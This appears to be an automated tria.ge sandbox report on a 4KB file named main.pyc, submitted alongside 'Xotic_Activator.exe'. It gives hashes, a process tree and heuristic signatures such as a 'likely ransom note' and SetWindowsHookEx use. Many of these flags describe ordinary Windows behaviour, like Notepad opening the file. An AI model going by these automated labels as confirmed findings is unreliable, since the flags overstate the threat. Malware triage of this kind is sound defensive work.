Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
107s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
03/02/2024, 14:03
Behavioral task
behavioral1
Sample
Xotic_Activator.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Xotic_Activator.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
main.pyc
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
main.pyc
Resource
win10v2004-20231215-en
General
-
Target
main.pyc
-
Size
4KB
-
MD5
78044e0945749775910ce61a3a0c8f74
-
SHA1
72ed0e3180c2f62b1e70c08dda96dc083f2a0074
-
SHA256
391cda8393509999ba2bc99c764de7ddb6b5b03a70a29af87bf50a1d5e09a17e
-
SHA512
a77820098223d5ff35f93da1876556b1dcda5f14837a155b9db73140dfb2e792e7137decfa342e9321ff96e06330ac48d392b35512b0e7f8145db6da664a06ab
-
SSDEEP
96:QEHXKag/on8jIIVTfHAlVPflDji+kgZjPlsx9SHfUh:d6agwIVTfJgZy3Nh
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings OpenWith.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3108 NOTEPAD.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3164 OpenWith.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe 3164 OpenWith.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3164 wrote to memory of 3108 3164 OpenWith.exe 96 PID 3164 wrote to memory of 3108 3164 OpenWith.exe 96
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\main.pyc1⤵
- Modifies registry class
PID:3320
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\main.pyc2⤵
- Opens file in notepad (likely ransom note)
PID:3108
-